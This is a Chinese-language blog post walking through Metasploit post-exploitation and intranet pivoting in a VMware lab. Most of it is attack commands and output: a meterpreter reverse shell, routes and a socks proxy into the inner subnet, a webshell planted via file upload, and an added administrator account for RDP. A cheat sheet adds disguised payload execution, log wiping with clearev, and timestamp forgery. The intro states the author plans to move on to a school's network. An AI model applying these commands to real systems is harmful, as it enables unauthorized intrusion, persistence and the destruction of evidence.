<!DOCTYPE html>
<html lang=zh>
<head><meta name="generator" content="Hexo 3.9.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="先模拟多层内网，摸清后渗透的使用，再从学校入手。内网渗透test">
<meta name="keywords" content="工具使用">
<meta property="og:type" content="article">
<meta property="og:title" content="msf多层内网穿透(基础篇)">
<meta property="og:url" content="https://alpha302.github.io/2019/10/28/msfconsole/index.html">
<meta property="og:site_name" content="Alpha的小站">
<meta property="og:description" content="先模拟多层内网，摸清后渗透的使用，再从学校入手。内网渗透test">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/B%60O%7E0%5BU%5DFA1.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/%25X382%5DSO.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/3%25%5BZ%7E%7B%7E73UK6VPP.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/SQ7%40K20%24P.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/B%60SVVA_1NGSQ07.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/%5BPF_T.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-16%2016-15-39%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-16%2016-30-27%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-16%2016-38-18%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2019-01-22%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2020-25-22%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2020-17-29%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2021-00-09%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2021-40-53%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2021-40-01%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2021-44-11%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2022-02-50%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2022-00-42%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2022-08-53%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/%25IU1.png">
<meta property="og:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/%25%24FXJE5F5.png">
<meta property="og:updated_time" content="2019-11-18T04:25:08.129Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="msf多层内网穿透(基础篇)">
<meta name="twitter:description" content="先模拟多层内网，摸清后渗透的使用，再从学校入手。内网渗透test">
<meta name="twitter:image" content="https://raw.githubusercontent.com/alpha302/cloudimg/master/B%60O%7E0%5BU%5DFA1.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>msf多层内网穿透(基础篇)</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- rss -->
    
    
</head>

<body class="max-width mx-auto px3">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives">Writing</a></li>
         
          <li><a href="/music">Music</a></li>
         
          <li><a href="/about">关于</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2019/10/29/kali更新完善/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2019/10/26/懒人处理闲置vps/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://alpha302.github.io/2019/10/28/msfconsole/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://alpha302.github.io/2019/10/28/msfconsole/&text=msf多层内网穿透(基础篇)"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://alpha302.github.io/2019/10/28/msfconsole/&title=msf多层内网穿透(基础篇)"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://alpha302.github.io/2019/10/28/msfconsole/&is_video=false&description=msf多层内网穿透(基础篇)"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=msf多层内网穿透(基础篇)&body=Check out this article: https://alpha302.github.io/2019/10/28/msfconsole/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://alpha302.github.io/2019/10/28/msfconsole/&title=msf多层内网穿透(基础篇)"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://alpha302.github.io/2019/10/28/msfconsole/&title=msf多层内网穿透(基础篇)"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://alpha302.github.io/2019/10/28/msfconsole/&title=msf多层内网穿透(基础篇)"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://alpha302.github.io/2019/10/28/msfconsole/&title=msf多层内网穿透(基础篇)"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://alpha302.github.io/2019/10/28/msfconsole/&name=msf多层内网穿透(基础篇)&description=&lt;p&gt;先模拟多层内网，摸清后渗透的使用，再从学校入手。&lt;br&gt;内网渗透test&lt;/p&gt;"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#网络拓扑"><span class="toc-number">1.</span> <span class="toc-text">网络拓扑</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#环境搭建"><span class="toc-number">2.</span> <span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#拿下跳板以及端口转发"><span class="toc-number">3.</span> <span class="toc-text">拿下跳板以及端口转发</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#获取内网win7的shell"><span class="toc-number">4.</span> <span class="toc-text">获取内网win7的shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#常用命令总结"><span class="toc-number">5.</span> <span class="toc-text">常用命令总结</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#execute执行文件"><span class="toc-number">5.0.1.</span> <span class="toc-text">execute执行文件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#migrate进程迁移"><span class="toc-number">5.0.2.</span> <span class="toc-text">migrate进程迁移</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#clearev清除日志"><span class="toc-number">5.0.3.</span> <span class="toc-text">clearev清除日志</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#timestomp伪造时间戳"><span class="toc-number">5.0.4.</span> <span class="toc-text">timestomp伪造时间戳</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#portfwd端口转发"><span class="toc-number">5.0.5.</span> <span class="toc-text">portfwd端口转发</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#autoroute添加路由"><span class="toc-number">5.0.6.</span> <span class="toc-text">autoroute添加路由</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#利用arp-scanner、portscan等进行扫描"><span class="toc-number">5.0.7.</span> <span class="toc-text">利用arp_scanner、portscan等进行扫描</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Socks代理"><span class="toc-number">5.0.8.</span> <span class="toc-text">Socks代理</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#键盘记录"><span class="toc-number">5.0.9.</span> <span class="toc-text">键盘记录</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#网络摄像头"><span class="toc-number">5.0.10.</span> <span class="toc-text">网络摄像头</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#截屏"><span class="toc-number">5.0.11.</span> <span class="toc-text">截屏</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#绕过UAC提权"><span class="toc-number">5.0.12.</span> <span class="toc-text">绕过UAC提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#窃取hash及密码-amp-哈希传递"><span class="toc-number">5.0.13.</span> <span class="toc-text">窃取hash及密码&amp;哈希传递</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#RDP"><span class="toc-number">5.0.14.</span> <span class="toc-text">RDP</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#后门植入"><span class="toc-number">5.0.15.</span> <span class="toc-text">后门植入</span></a></li></ol></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index my4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        msf多层内网穿透(基础篇)
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Alpha的小站</span>
      </span>
      
    <div class="postdate">
        <time datetime="2019-10-28T13:54:31.000Z" itemprop="datePublished">2019-10-28</time>
    </div>


      
    <span class="article-categories">
        分类：<a class="category-link" href="/categories/工具使用/">工具使用</a>
    </span>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/工具使用/">工具使用</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>先模拟多层内网，摸清后渗透的使用，再从学校入手。<br>内网渗透test</p>
<a id="more"></a>

<hr>
<h2 id="网络拓扑"><a href="#网络拓扑" class="headerlink" title="网络拓扑"></a>网络拓扑</h2><p><img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/B%60O%7E0%5BU%5DFA1.png" alt></p>
<p>以kali为攻击机，xp作为跳板主机，win7是内网主机</p>
<p>xp主机是提供web，FTP等服务，已被kali机获取shell</p>
<p>win7正常不与外网访问，和DMZ区域处于同一网段</p>
<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><p>使用VMware的主机模式，构建虚拟局域网。<strong>查看<a href="https://cx-a.com/huamu/88.html" target="_blank" rel="noopener">Host-only模式详解</a></strong></p>
<p>虚拟网络编译器中添加两块网卡vm1，vm2。 <strong>类型</strong>：主机模式<br><img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/%25X382%5DSO.png" alt></p>
<p>设置xp为双网卡vm1,vm2。其余按网络拓扑分配网卡</p>
<p><img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/3%25%5BZ%7E%7B%7E73UK6VPP.png" alt></p>
<p><strong>查看ip</strong></p>
<p>kali<br><img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/SQ7%40K20%24P.png" alt></p>
<p>xp<br><img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/B%60SVVA_1NGSQ07.png" alt></p>
<p>win7<br><img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/%5BPF_T.png" alt></p>
<p>至此环境布置完毕</p>
<h2 id="拿下跳板以及端口转发"><a href="#拿下跳板以及端口转发" class="headerlink" title="拿下跳板以及端口转发"></a>拿下跳板以及端口转发</h2><p>以社工等方法获取到xp主机的shell<br>通过metasploit会话，使用Windows xp靶机作为跳板，扫描和攻击内部网络主机</p>
<figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#kali msf</span></span><br><span class="line">msf5 &gt; use exploit/multi/handler </span><br><span class="line">msf5 exploit(multi/handler) &gt; set payload windows/meterpreter/reverse_tcp</span><br><span class="line">payload =&gt; windows/meterpreter/reverse_tcp</span><br><span class="line">msf5 exploit(multi/handler) &gt; set lhost <span class="number">192.168</span><span class="number">.252</span><span class="number">.128</span></span><br><span class="line">lhost =&gt; <span class="number">192.168</span><span class="number">.252</span><span class="number">.128</span></span><br><span class="line">msf5 exploit(multi/handler) &gt; set lport <span class="number">4444</span></span><br><span class="line">lport =&gt; <span class="number">4444</span></span><br><span class="line">msf5 exploit(multi/handler) &gt; run</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on <span class="number">192.168</span><span class="number">.252</span><span class="number">.128</span>:<span class="number">4444</span> </span><br><span class="line">[*] Sending stage (<span class="number">180291</span> bytes) to <span class="number">192.168</span><span class="number">.252</span><span class="number">.130</span></span><br><span class="line">[*] Meterpreter session <span class="number">1</span> opened (<span class="number">192.168</span><span class="number">.252</span><span class="number">.128</span>:<span class="number">4444</span> -&gt; <span class="number">192.168</span><span class="number">.252</span><span class="number">.130</span>:<span class="number">1814</span>) at <span class="number">2019</span>-<span class="number">11</span>-<span class="number">16</span> <span class="number">12</span>:<span class="number">44</span>:<span class="number">58</span> +<span class="number">0800</span></span><br><span class="line"></span><br><span class="line">meterpreter &gt; ifconfig</span><br><span class="line"></span><br><span class="line">Interface  <span class="number">1</span></span><br><span class="line">============</span><br><span class="line">Name         : MS TCP Loopback interface</span><br><span class="line">Hardware MAC : <span class="number">00</span>:<span class="number">00</span>:<span class="number">00</span>:<span class="number">00</span>:<span class="number">00</span>:<span class="number">00</span></span><br><span class="line">MTU          : <span class="number">1520</span></span><br><span class="line">IPv4 Address : <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Interface  <span class="number">2</span></span><br><span class="line">============</span><br><span class="line">Name         : AMD PCNET Family PCI Ethernet Adapter - rface</span><br><span class="line">Hardware MAC : <span class="number">00</span>:0c:<span class="number">29</span>:dd:e6:<span class="number">94</span></span><br><span class="line">MTU          : <span class="number">1500</span></span><br><span class="line">IPv4 Address : <span class="number">192.168</span><span class="number">.85</span><span class="number">.129</span></span><br><span class="line">IPv4 Netmask : <span class="number">255.255</span><span class="number">.255</span><span class="number">.0</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Interface  <span class="number">3</span></span><br><span class="line">============</span><br><span class="line">Name         : VMware Accelerated AMD PCNet Adapter - rface</span><br><span class="line">Hardware MAC : <span class="number">00</span>:0c:<span class="number">29</span>:dd:e6:<span class="number">9e</span></span><br><span class="line">MTU          : <span class="number">1500</span></span><br><span class="line">IPv4 Address : <span class="number">192.168</span><span class="number">.252</span><span class="number">.130</span></span><br><span class="line">IPv4 Netmask : <span class="number">255.255</span><span class="number">.255</span><span class="number">.0</span></span><br></pre></td></tr></table></figure>

<p>可以看到xp是双网卡，发现另一内网段 192.168.85.0/24。</p>
<p>对该内网进行渗透</p>
<ol>
<li><p>添加内网的路由</p>
 <figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; run autoroute -s <span class="number">192.168</span><span class="number">.85</span><span class="number">.0</span>/<span class="number">24</span>    <span class="comment">#添加目标网段路由规则，获取内部网络访问通道</span></span><br><span class="line">meterpreter &gt; route flush  <span class="comment">#不用的时候,记得删掉就行</span></span><br></pre></td></tr></table></figure>

<p> <img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-16%2016-15-39%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt></p>
</li>
<li><p>扫描内网主机</p>
 <figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; run post/windows/gather/arp_scanner RHOSTS=<span class="number">192.168</span><span class="number">.85</span><span class="number">.0</span>/<span class="number">24</span> <span class="comment">#arp扫描粗略的扫一眼目标内网的机器大概有多少</span></span><br></pre></td></tr></table></figure>

<p> 发现 192.168.85.128的主机</p>
<p> <img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-16%2016-30-27%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt></p>
</li>
<li><p>socks代理</p>
 <figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#利用sock4a模块对目标内网代理，只能负责tcp的流量，并不是socks代理进去以后就什么都能搞了</span></span><br><span class="line">meterpreter &gt; background</span><br><span class="line">msf exploit(handler) &gt; use auxiliary/server/socks4a </span><br><span class="line">msf auxiliary(socks4a) &gt; set srvhost <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line">msf auxiliary(socks4a) &gt; set srvport <span class="number">1111</span></span><br><span class="line">msf auxiliary(socks4a) &gt; run</span><br></pre></td></tr></table></figure>

<p> <img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-16%2016-38-18%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt></p>
<p> 在proxychians.conf中设置好代理,就可以对目标进行正常的内网渗透了</p>
 <figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">vi /etc/proxychains.conf</span><br><span class="line"><span class="comment">#在文件末尾添加socks4代理服务器</span></span><br></pre></td></tr></table></figure>

<p> <img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2019-01-22%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt></p>
<p> 利用proxychains代理扫描并执行nmap操作</p>
 <figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains nmap -Pn -sT <span class="number">192.168</span><span class="number">.85</span><span class="number">.0</span>/<span class="number">24</span> -p1-<span class="number">100</span></span><br></pre></td></tr></table></figure>

<p> <img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2020-25-22%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt></p>
<ol start="4">
<li><p>发现存在80端口，google配置代理</p>
<p><img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2020-17-29%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt></p>
<p>查看<br><img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2021-00-09%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt></p>
</li>
</ol>
</li>
</ol>
<h2 id="获取内网win7的shell"><a href="#获取内网win7的shell" class="headerlink" title="获取内网win7的shell"></a>获取内网win7的shell</h2><ol>
<li><p>使用任意文件上传，获取路径</p>
<p> <img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2021-40-53%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt></p>
</li>
<li><p>这里使用蚁剑连接</p>
<p><img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2021-40-01%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt></p>
</li>
<li><p>可以看到win7 开启了3389端口<br><img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2021-44-11%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt></p>
</li>
<li><p>这里开启并使用远程桌面</p>
<figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 创建新的管理员账户(直接更改管理员密码 net user Administrator 123)</span></span><br><span class="line">whoami</span><br><span class="line">net user</span><br><span class="line">net user wk <span class="number">123</span> /add</span><br><span class="line">net localgroup administrators wk /add   <span class="comment">#wk加入管理员账户</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 使用远程桌面</span></span><br><span class="line">portfwd add -l <span class="number">2222</span> -p <span class="number">3389</span> -r <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>  <span class="comment">#先将3389流量转发到代理服务器</span></span><br><span class="line">rdesktop <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">2222</span>     <span class="comment">#kali自带rdesktop</span></span><br></pre></td></tr></table></figure>

<p> <img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2022-02-50%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="权限为系统权限"></p>
<p> <img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2022-00-42%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt></p>
<p> <img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/2019-11-17%2022-08-53%20%E7%9A%84%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt></p>
<p> 我这里出现错误，下载的win 7的系统有问题，但是此时的用户是正常使用的。<br> <img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/%25IU1.png" alt></p>
<p> <img src="https://raw.githubusercontent.com/alpha302/cloudimg/master/%25%24FXJE5F5.png" alt></p>
<p> 到此时，接下来的操作大家都懂的！</p>
</li>
</ol>
<h2 id="常用命令总结"><a href="#常用命令总结" class="headerlink" title="常用命令总结"></a>常用命令总结</h2><h4 id="execute执行文件"><a href="#execute执行文件" class="headerlink" title="execute执行文件"></a>execute执行文件</h4><figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">execute <span class="comment">#在目标机中执行文件</span></span><br><span class="line">execute -H -i -f  cmd.exe <span class="comment"># 创建新进程cmd.exe，-H不可见，-i交互</span></span><br><span class="line">execute -H -m -d notepad.exe -f payload.exe -a <span class="string">"-o hack.txt"</span></span><br><span class="line"><span class="comment"># -d 在目标主机执行时显示的进程名称（用以伪装）-m 直接从内存中执行</span></span><br><span class="line"><span class="string">"-o hack.txt"</span>是payload.exe的运行参数</span><br></pre></td></tr></table></figure>

<h4 id="migrate进程迁移"><a href="#migrate进程迁移" class="headerlink" title="migrate进程迁移"></a>migrate进程迁移</h4><figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">getpid    <span class="comment"># 获取当前进程的pid</span></span><br><span class="line">ps   <span class="comment"># 查看当前活跃进程</span></span><br><span class="line">migrate &lt;pid值&gt;    <span class="comment"># 将Meterpreter会话移植到指定pid值进程中</span></span><br><span class="line">kill &lt;pid值&gt;   <span class="comment"># 杀死进程</span></span><br></pre></td></tr></table></figure>

<h4 id="clearev清除日志"><a href="#clearev清除日志" class="headerlink" title="clearev清除日志"></a>clearev清除日志</h4><figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">clearev  <span class="comment"># 清除windows中的应用程序日志、系统日志、安全日志</span></span><br></pre></td></tr></table></figure>

<h4 id="timestomp伪造时间戳"><a href="#timestomp伪造时间戳" class="headerlink" title="timestomp伪造时间戳"></a>timestomp伪造时间戳</h4><figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">timestomp C:\\ -h   <span class="comment">#查看帮助</span></span><br><span class="line">timestomp -v C:\\<span class="number">2.</span>txt   <span class="comment">#查看时间戳</span></span><br><span class="line">timestomp C:\\<span class="number">2.</span>txt -f C:\\<span class="number">1.</span>txt <span class="comment">#将1.txt的时间戳复制给2.txt</span></span><br><span class="line">timestomp  c:\\test\\<span class="number">22.</span>txt -z <span class="string">"03/10/2019 11:55:55"</span> -v <span class="comment"># 把四个属性设置为统一时间</span></span><br></pre></td></tr></table></figure>

<h4 id="portfwd端口转发"><a href="#portfwd端口转发" class="headerlink" title="portfwd端口转发"></a>portfwd端口转发</h4><figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">portfwd add -l <span class="number">1111</span> -p <span class="number">3389</span> -r <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> <span class="comment">#将目标机的3389端口转发到本地1111端口</span></span><br><span class="line">rdesktop <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">1111</span> <span class="comment"># 需要输入用户名密码连接</span></span><br><span class="line">rdesktop -u Administrator -p <span class="number">123</span> <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">1111</span> <span class="comment"># -u 用户名 -p 密码</span></span><br></pre></td></tr></table></figure>

<h4 id="autoroute添加路由"><a href="#autoroute添加路由" class="headerlink" title="autoroute添加路由"></a>autoroute添加路由</h4><figure class="highlight r"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">run autoroute -h <span class="comment"># 查看帮助</span></span><br><span class="line">run get_local_subnets <span class="comment"># 查看目标内网网段地址</span></span><br><span class="line">run autoroute -s <span class="number">192.168</span><span class="number">.183</span><span class="number">.0</span>/<span class="number">24</span>  <span class="comment"># 添加目标网段路由</span></span><br><span class="line">run autoroute -p  <span class="comment"># 查看添加的路由</span></span><br></pre></td></tr></table></figure>

